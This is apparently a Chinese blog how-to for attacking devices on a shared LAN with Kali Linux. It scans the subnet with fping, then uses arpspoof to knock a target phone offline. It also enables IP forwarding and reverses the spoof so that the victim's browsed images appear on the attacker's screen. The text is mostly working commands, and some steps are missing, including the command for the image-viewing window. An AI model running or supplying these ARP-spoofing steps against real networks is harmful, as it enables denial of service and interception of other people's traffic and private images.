使用kali对同一局域网内的设备进行断网和查看设备图片

首先,如果kali是在虚拟机中运行的,需要使用桥接网络。

断网操作

1,首先,查看自己的IP,我的是192.168.1.125

命令:ifconfig

2,然后,查看当前局域网的还有那些设备。

命令:fping -g 192.168.1.125/24

3,然后选择一个设备作为攻击目标,拿自己的手机来做栗子>!< 查看了我的手机的IP为192.168.1.100(拿我的小米手机来说查看IP在  设置-我的设备-全部参数-状态信息-IP地址)

现在我的手机可以上网

键入命令:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1   

此时我的手机:

如果想要停止断网,就在kali端ctrl+Z

查看设备图片

1,首先echo 1 > /proc/sys/net/ipv4/ip_forward   (1代表可以转发)

2,查看同一局域网的设备 如上

fping -g 192.168.1.125/24

3,还是拿我的手机来做栗子

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

然后

同时弹出一个窗口,此时我的手机浏览那些网络,其中的图片就会显示在这个窗口中。

在窗口中显示:

 

Ok啦!!!!

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页